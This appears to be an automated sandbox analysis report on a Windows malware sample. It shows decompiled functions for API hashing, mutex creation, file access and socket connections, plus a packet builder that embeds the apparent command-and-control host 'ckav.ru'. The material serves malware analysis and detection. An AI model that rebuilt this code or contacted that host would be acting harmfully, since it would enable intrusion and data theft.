                          • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 721 404e17-404e57 getaddrinfo 722 404e59-404e5b 721->722 723 404e5d-404e84 call 402b7c socket 721->723 724 404ecf-404ed3 722->724 727 404e86-404e96 call 402bab freeaddrinfo 723->727 728 404e98-404ea7 connect 723->728 739 404ec7-404ec9 727->739 730 404eb3-404ebe freeaddrinfo 728->730 731 404ea9-404eb1 call 404de5 728->731 733 404ec0-404ec6 call 402bab 730->733 734 404ecb 730->734 731->730 733->739 738 404ecd-404ece 734->738 738->724 739->738
                          C-Code - Quality: 37%
                          			E00404E17(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v40;
				void* _t23;
				signed int _t24;
				signed int* _t25;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				signed int _t41;
				void* _t42;
				signed int* _t43;

				_v8 = _v8 & 0x00000000;
				_t33 = 8;
				memset( &_v40, 0, _t33 << 2);
				_v32 = 1;
				_t23 =  &_v40;
				_v28 = 6;
				_v36 = 2;
				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
				if(_t23 == 0) {
					_t24 = E00402B7C(4);
					_t43 = _t24;
					_t31 = _t30 | 0xffffffff;
					 *_t43 = _t31;
					_t41 = _v8;
					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
					 *_t43 = _t24;
					if(_t24 != _t31) {
						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
						if(_t24 == _t31) {
							E00404DE5(_t24,  *_t43);
							 *_t43 = _t31;
						}
						__imp__freeaddrinfo(_v8);
						if( *_t43 != _t31) {
							_t25 = _t43;
							goto L10;
						} else {
							E00402BAB(_t43);
							L8:
							_t25 = 0;
							L10:
							return _t25;
						}
					}
					E00402BAB(_t43);
					__imp__freeaddrinfo(_v8);
					goto L8;
				}
				return 0;
			}

















                          0x00404e1d
                          0x00404e26
                          0x00404e2a
                          0x00404e2f
                          0x00404e37
                          0x00404e3a
                          0x00404e45
                          0x00404e4f
                          0x00404e57
                          0x00404e61
                          0x00404e66
                          0x00404e68
                          0x00404e6c
                          0x00404e6e
                          0x00404e7a
                          0x00404e80
                          0x00404e84
                          0x00404e9f
                          0x00404ea7
                          0x00404eab
                          0x00404eb1
                          0x00404eb1
                          0x00404eb6
                          0x00404ebe
                          0x00404ecb
                          0x00000000
                          0x00404ec0
                          0x00404ec1
                          0x00404ec7
                          0x00404ec7
                          0x00404ecd
                          0x00000000
                          0x00404ece
                          0x00404ebe
                          0x00404e87
                          0x00404e90
                          0x00000000
                          0x00404e90
                          0x00000000

                          APIs
                          • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                          • socket.WS2_32(?,?,?), ref: 00404E7A
                          • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: freeaddrinfogetaddrinfosocket
                          • String ID:
                          • API String ID: 2479546573-0
                          • Opcode ID: 24ce84c10c969aea94c1025059d7642f8b55e38ae369deafe647ee036e6b461b
                          • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                          • Opcode Fuzzy Hash: 24ce84c10c969aea94c1025059d7642f8b55e38ae369deafe647ee036e6b461b
                          • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129filememoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 741 4040bb-4040f2 call 4031e5 CreateFileW 744 4040f8-404111 call 4031e5 741->744 745 40418d-404190 741->745 756 404113-404119 744->756 757 40417a 744->757 747 404192-4041a7 call 403c90 745->747 748 404184 745->748 747->748 753 4041a9-4041b8 call 403c59 747->753 751 404186-40418c 748->751 761 4041ba-4041d8 call 4040bb call 403d44 753->761 762 4041db-4041e4 call 402bab 753->762 756->757 760 40411b-404120 756->760 759 40417d-40417e call 403c40 757->759 768 404183 759->768 764 404122 760->764 765 404124-404140 call 4031e5 VirtualAlloc 760->765 761->762 762->751 764->765 765->757 773 404142-40415e call 4031e5 ReadFile 765->773 768->748 773->759 778 404160-404178 call 4031e5 773->778 778->759
                          C-Code - Quality: 74%
                          			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				long _v16;
				void* __ebx;
				void* __edi;
				void* _t16;
				intOrPtr* _t25;
				long* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void* _t35;
				void* _t42;
				intOrPtr _t43;
				long _t44;
				struct _OVERLAPPED* _t46;

				_t46 = 0;
				_t35 = 0;
				E004031E5(0, 0, 0xe9fabb88, 0, 0);
				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t42 = _t16;
				_v8 = _t42;
				if(_t42 == 0xffffffff) {
					__eflags = _a12;
					if(_a12 == 0) {
						L10:
						return _t35;
					}
					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
					__eflags = _t43;
					if(_t43 == 0) {
						goto L10;
					}
					_push(0);
					__eflags = E00403C59(_a4, _t43);
					if(__eflags != 0) {
						_v8 = 0;
						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
						_push(_t43);
						 *_a8 = _v8;
						E00403D44();
					}
					E00402BAB(_t43);
					return _t46;
				}
				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
				_t44 =  *_t25(_t42,  &_v12);
				if(_v12 != 0 || _t44 > 0x40000000) {
					L8:
					_t45 = _v8;
					goto L9;
				} else {
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 = _t44;
					}
					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
					_t35 = _t30;
					if(_t35 == 0) {
						goto L8;
					} else {
						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
						_t45 = _v8;
						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
						if(_t32 == 0) {
							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
							 *_t33(_t35, _t46, 0x8000);
							_t35 = _t46;
						}
						L9:
						E00403C40(_t45); // executed
						goto L10;
					}
				}
			}



















                          0x004040c4
                          0x004040ce
                          0x004040d0
                          0x004040e8
                          0x004040ea
                          0x004040ec
                          0x004040f2
                          0x0040418d
                          0x00404190
                          0x00404184
                          0x00000000
                          0x00404184
                          0x004041a0
                          0x004041a5
                          0x004041a7
                          0x00000000
                          0x00000000
                          0x004041a9
                          0x004041b6
                          0x004041b8
                          0x004041be
                          0x004041cb
                          0x004041d0
                          0x004041d1
                          0x004041d3
                          0x004041d8
                          0x004041dc
                          0x00000000
                          0x004041e2
                          0x00404100
                          0x0040410c
                          0x00404111
                          0x0040417a
                          0x0040417a
                          0x00000000
                          0x0040411b
                          0x0040411b
                          0x00404120
                          0x00404122
                          0x00404122
                          0x0040412c
                          0x0040413a
                          0x0040413c
                          0x00404140
                          0x00000000
                          0x00404142
                          0x0040414a
                          0x00404155
                          0x0040415a
                          0x0040415e
                          0x00404168
                          0x00404174
                          0x00404176
                          0x00404176
                          0x0040417d
                          0x0040417e
                          0x00000000
                          0x00404183
                          0x00404140

                          APIs
                          • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                          • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$AllocCreateReadVirtual
                          • String ID: .tmp
                          • API String ID: 3585551309-2986845003
                          • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                          • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                          • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                          • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON
                          Download Yara Rule
                          C-Code - Quality: 79%
                          			E00413866(void* __eflags) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				char _v48;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				void* __ebx;
				void* __edi;
				void* _t38;
				short _t43;
				short _t44;
				short _t45;
				short _t46;
				short _t47;
				short _t48;
				short _t50;
				short _t51;
				short _t52;
				short _t54;
				short _t55;
				intOrPtr* _t57;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t63;
				WCHAR* _t65;
				long _t68;
				void* _t75;
				short _t76;
				short _t78;
				short _t83;
				short _t84;
				short _t85;

				E00402C6C(_t38);
				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
				SetErrorMode(3); // executed
				_t43 = 0x4f;
				_v76 = _t43;
				_t44 = 0x4c;
				_v74 = _t44;
				_t45 = 0x45;
				_v72 = _t45;
				_t46 = 0x41;
				_v70 = _t46;
				_t47 = 0x55;
				_v68 = _t47;
				_t48 = 0x54;
				_t76 = 0x33;
				_t84 = 0x32;
				_t83 = 0x2e;
				_t78 = 0x64;
				_t85 = 0x6c;
				_v66 = _t48;
				_v52 = 0;
				_t50 = 0x77;
				_v48 = _t50;
				_t51 = 0x73;
				_v46 = _t51;
				_t52 = 0x5f;
				_v42 = _t52;
				_v28 = 0;
				_t54 = 0x6f;
				_v24 = _t54;
				_t55 = 0x65;
				_v20 = _t55;
				_v64 = _t76;
				_v62 = _t84;
				_v60 = _t83;
				_v58 = _t78;
				_v56 = _t85;
				_v54 = _t85;
				_v44 = _t84;
				_v40 = _t76;
				_v38 = _t84;
				_v36 = _t83;
				_v34 = _t78;
				_v32 = _t85;
				_v30 = _t85;
				_v22 = _t85;
				_v18 = _t76;
				_v16 = _t84;
				_v14 = _t83;
				_v12 = _t78;
				_v10 = _t85;
				_v8 = _t85;
				_v6 = 0;
				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t57( &_v76);
				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t59( &_v48);
				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				_t81 =  &_v24;
				 *_t61( &_v24); // executed
				_t63 = E00414059(); // executed
				if(_t63 != 0) {
					_t65 = E00413D97(0);
					E004031E5(0, 0, 0xcf167df4, 0, 0);
					CreateMutexW(0, 1, _t65); // executed
					_t68 = GetLastError();
					_t92 = _t68 - 0xb7;
					if(_t68 == 0xb7) {
						E00413B81(0);
						_pop(_t81); // executed
					}
					E00413003(_t92); // executed
					E00412B2E(_t92); // executed
					E00412D31(_t81, _t84); // executed
					E00413B3F();
					E00413B81(0);
					 *0x49fdd0 = 1;
				}
				return 0;
			}































































                          0x0041386f
                          0x0041387e
                          0x00413885
                          0x00413889
                          0x0041388c
                          0x00413890
                          0x00413893
                          0x00413897
                          0x0041389a
                          0x0041389e
                          0x004138a1
                          0x004138a5
                          0x004138a8
                          0x004138ac
                          0x004138af
                          0x004138b2
                          0x004138b5
                          0x004138b8
                          0x004138bb
                          0x004138bc
                          0x004138c4
                          0x004138c8
                          0x004138cb
                          0x004138cf
                          0x004138d2
                          0x004138d6
                          0x004138d7
                          0x004138df
                          0x004138e3
                          0x004138e4
                          0x004138ea
                          0x004138eb
                          0x004138f1
                          0x004138f5
                          0x004138f9
                          0x004138fd
                          0x00413901
                          0x00413905
                          0x00413909
                          0x0041390d
                          0x00413911
                          0x00413915
                          0x00413919
                          0x0041391d
                          0x00413921
                          0x00413925
                          0x00413929
                          0x0041392d
                          0x00413931
                          0x00413935
                          0x00413939
                          0x0041393d
                          0x00413941
                          0x00413950
                          0x00413959
                          0x0041395f
                          0x00413968
                          0x0041396e
                          0x00413973
                          0x00413977
                          0x00413979
                          0x00413980
                          0x00413982
                          0x00413991
                          0x0041399c
                          0x0041399e
                          0x004139a4
                          0x004139a9
                          0x004139ac
                          0x004139b1
                          0x004139b1
                          0x004139b2
                          0x004139b7
                          0x004139bc
                          0x004139c1
                          0x004139c7
                          0x004139cd
                          0x004139cd
                          0x004139db

                          APIs
                          • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                          • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                          • GetLastError.KERNEL32 ref: 0041399E
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: Error$CreateLastModeMutex
                          • String ID:
                          • API String ID: 3448925889-0
                          • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                          • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                          • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                          • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v8;
				void* _t7;
				long _t10;
				void* _t21;
				struct _OVERLAPPED* _t24;

				_t14 = __ebx;
				_t24 = 0;
				_v8 = 0;
				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
				_t21 = _t7;
				if(_t21 != 0xffffffff) {
					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
					if(_t10 != 0xffffffff) {
						E004031E5(_t14, 0, 0xc148f916, 0, 0);
						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
						_t24 =  !=  ? 1 : 0;
					}
					E00403C40(_t21);
				}
				return _t24;
			}








                          0x004042cf
                          0x004042d5
                          0x004042df
                          0x004042e2
                          0x004042f9
                          0x004042fb
                          0x00404300
                          0x0040430a
                          0x00404314
                          0x00404319
                          0x00404323
                          0x00404334
                          0x0040433b
                          0x0040433b
                          0x0040433f
                          0x00404344
                          0x0040434c

                          APIs
                          • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                          • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CreatePointerWrite
                          • String ID:
                          • API String ID: 3672724799-0
                          • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                          • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                          • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                          • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON
                          Download Yara Rule
                          C-Code - Quality: 35%
                          			E00412D31(void* __ecx, void* __edi) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v40;
				void* __ebx;
				intOrPtr* _t10;
				void* _t11;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t31;
				void* _t33;
				void* _t35;
				void* _t53;
				char* _t57;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t53 = __ecx;
				_t10 =  *0x49fde0;
				_t68 = _t67 - 0x24;
				 *0x49fddc = 0x927c0;
				 *0x49fde4 = 0;
				_t75 = _t10;
				if(_t10 != 0) {
					L16:
					_push(1);
					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
					_t61 = _t11;
					_t68 = _t68 + 0xc;
					if(_t61 != 0) {
						E004031E5(0, 0, 0xfcae4162, 0, 0);
						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
					}
					L004067C4(0xea60); // executed
					_pop(_t53);
				} else {
					_push(__edi);
					 *0x49fde0 = E004056BF(0x2bc);
					E00413DB7(_t53, _t75,  &_v40);
					_t57 =  &_v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004058D4( *0x49fde0, 0x12);
					E004058D4( *0x49fde0, 0x28);
					E00405872( *0x49fde0, "ckav.ru", 0, 0);
					_t69 = _t68 + 0x28;
					_t64 = E0040632F();
					_push(0);
					_push(1);
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						E00405872();
						_t70 = _t69 + 0x10;
					} else {
						_push(_t64);
						_push( *0x49fde0);
						E00405872();
						E00402BAB(_t64);
						_t70 = _t69 + 0x14;
					}
					_t58 = E00406130(_t57);
					_push(0);
					_push(1);
					_t77 = _t64;
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t25 = E00405872();
						_t71 = _t70 + 0x10; // executed
					} else {
						_push(_t58);
						_push( *0x49fde0);
						E00405872();
						_t25 = E00402BAB(_t58);
						_t71 = _t70 + 0x14;
					}
					_t26 = E004061C3(_t25, 0, _t77); // executed
					_t65 = _t26;
					_push(0);
					_push(1);
					if(_t65 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t27 = E00405872();
						_t72 = _t71 + 0x10;
					} else {
						_push(_t65);
						_push( *0x49fde0);
						E00405872();
						_t27 = E00402BAB(_t65);
						_t72 = _t71 + 0x14;
					}
					_t66 = E00406189(_t27);
					_t79 = _t66;
					if(_t66 == 0) {
						E00405781( *0x49fde0, 0);
						E00405781( *0x49fde0, 0);
						_t73 = _t72 + 0x10; // executed
					} else {
						E00405781( *0x49fde0,  *_t66);
						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
						E00402BAB(_t66);
						_t73 = _t72 + 0x14;
					}
					_t31 = E004063B2(0, _t53, _t79); // executed
					E004058D4( *0x49fde0, _t31); // executed
					_t33 = E004060BD(_t79); // executed
					E004058D4( *0x49fde0, _t33); // executed
					_t35 = E0040642C(_t79); // executed
					E004058D4( *0x49fde0, _t35);
					E004058D4( *0x49fde0, _v24);
					E004058D4( *0x49fde0, _v20);
					E004058D4( *0x49fde0, _v16);
					E004058D4( *0x49fde0, _v12);
					E00405872( *0x49fde0, E00413D97(0), 1, 0);
					_t68 = _t73 + 0x48;
				}
				_t80 =  *0x49fde4;
				if( *0x49fde4 == 0) {
					_t10 =  *0x49fde0;
					goto L16;
				}
				return E00405695(_t53,  *0x49fde0);
			}
































                          0x00412d31
                          0x00412d34
                          0x00412d39
                          0x00412d3c
                          0x00412d49
                          0x00412d50
                          0x00412d52
                          0x00412f24
                          0x00412f24
                          0x00412f2b
                          0x00412f30
                          0x00412f32
                          0x00412f37
                          0x00412f41
                          0x00412f53
                          0x00412f53
                          0x00412f5b
                          0x00412f60
                          0x00412d58
                          0x00412d58
                          0x00412d63
                          0x00412d6c
                          0x00412d73
                          0x00412d7e
                          0x00412d7f
                          0x00412d80
                          0x00412d81
                          0x00412d82
                          0x00412d8f
                          0x00412da1
                          0x00412da6
                          0x00412dae
                          0x00412db0
                          0x00412db1
                          0x00412db5
                          0x00412dce
                          0x00412dcf
                          0x00412dd5
                          0x00412dda
                          0x00412db7
                          0x00412db7
                          0x00412db8
                          0x00412dbe
                          0x00412dc4
                          0x00412dc9
                          0x00412dc9
                          0x00412de2
                          0x00412de4
                          0x00412de5
                          0x00412de7
                          0x00412de9
                          0x00412e02
                          0x00412e03
                          0x00412e09
                          0x00412e0e
                          0x00412deb
                          0x00412deb
                          0x00412dec
                          0x00412df2
                          0x00412df8
                          0x00412dfd
                          0x00412dfd
                          0x00412e11
                          0x00412e17
                          0x00412e19
                          0x00412e1a
                          0x00412e1e
                          0x00412e37
                          0x00412e38
                          0x00412e3e
                          0x00412e43
                          0x00412e20
                          0x00412e20
                          0x00412e21
                          0x00412e27
                          0x00412e2d
                          0x00412e32
                          0x00412e32
                          0x00412e4b
                          0x00412e4d
                          0x00412e4f
                          0x00412e7e
                          0x00412e8a
                          0x00412e8f
                          0x00412e51
                          0x00412e59
                          0x00412e67
                          0x00412e6d
                          0x00412e72
                          0x00412e72
                          0x00412e92
                          0x00412e9e
                          0x00412ea3
                          0x00412eaf
                          0x00412eb4
                          0x00412ec0
                          0x00412ece
                          0x00412edc
                          0x00412eea
                          0x00412ef8
                          0x00412f0f
                          0x00412f14
                          0x00412f14
                          0x00412f17
                          0x00412f1d
                          0x00412f1f
                          0x00000000
                          0x00412f1f
                          0x00412f74

                          APIs
                          • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                            • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                            • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                            • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$CreateFreeProcessThread_wmemset
                          • String ID: ckav.ru
                          • API String ID: 2915393847-2696028687
                          • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                          • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                          • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                          • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0040632F() {
				char _v8;
				void* _t4;
				void* _t7;
				void* _t16;

				_t16 = E00402B7C(0x208);
				if(_t16 == 0) {
					L4:
					_t4 = 0;
				} else {
					E0040338C(_t16, 0, 0x104);
					_t1 =  &_v8; // 0x4143e8
					_v8 = 0x208;
					_t7 = E00406069(_t16, _t1); // executed
					if(_t7 == 0) {
						E00402BAB(_t16);
						goto L4;
					} else {
						_t4 = _t16;
					}
				}
				return _t4;
			}







                          0x00406340
                          0x00406345
                          0x00406373
                          0x00406373
                          0x00406347
                          0x0040634f
                          0x00406354
                          0x00406357
                          0x0040635c
                          0x00406366
                          0x0040636d
                          0x00000000
                          0x00406368
                          0x00406368
                          0x00406368
                          0x00406366
                          0x0040637a

                          APIs
                            • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                            • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                          • _wmemset.LIBCMT ref: 0040634F
                            • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser_wmemset
                          • String ID: CA
                          • API String ID: 2078537776-1052703068
                          • Opcode ID: 0c36caef9c7c41fd875b4d08fbd99bdca921340744b7e48925f82431a1c9c547
                          • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                          • Opcode Fuzzy Hash: 0c36caef9c7c41fd875b4d08fbd99bdca921340744b7e48925f82431a1c9c547
                          • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0041284A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0041284A(void* _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, int _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 2, 0xebb783d2, 0, 0);
				_t7 = SHRegSetPathW(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}





                          0x00412858
                          0x0041286c
                          0x0041286f

                          APIs
                          • SHRegSetPathW.SHLWAPI(00000000,?,00000000,-80000001,00412D05,00000002,EBB783D2,00000000,00000000,5,A,00412D05,-80000001,00000000,5,A,00000000,00000000), ref: 0041286C
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: Path
                          • String ID: 5,A
                          • API String ID: 2875597873-3842761921
                          • Opcode ID: 985f833e562fc410bf8876cb62ef75c9432edfe987e4e1d4c2e5d722ffee7efc
                          • Instruction ID: e513a9aa1dc03f827004651369457c754081445531a40a51076ab4492d9af12d
                          • Opcode Fuzzy Hash: 985f833e562fc410bf8876cb62ef75c9432edfe987e4e1d4c2e5d722ffee7efc
                          • Instruction Fuzzy Hash: 48D0C93214020DBBDF026EC1DC02F9A3F2AAB48754F004014BB18280A1D6B3A630ABA9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 9, 0xecae3497, 0, 0);
				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}





                          0x00406094
                          0x004060a8
                          0x004060ab

                          APIs
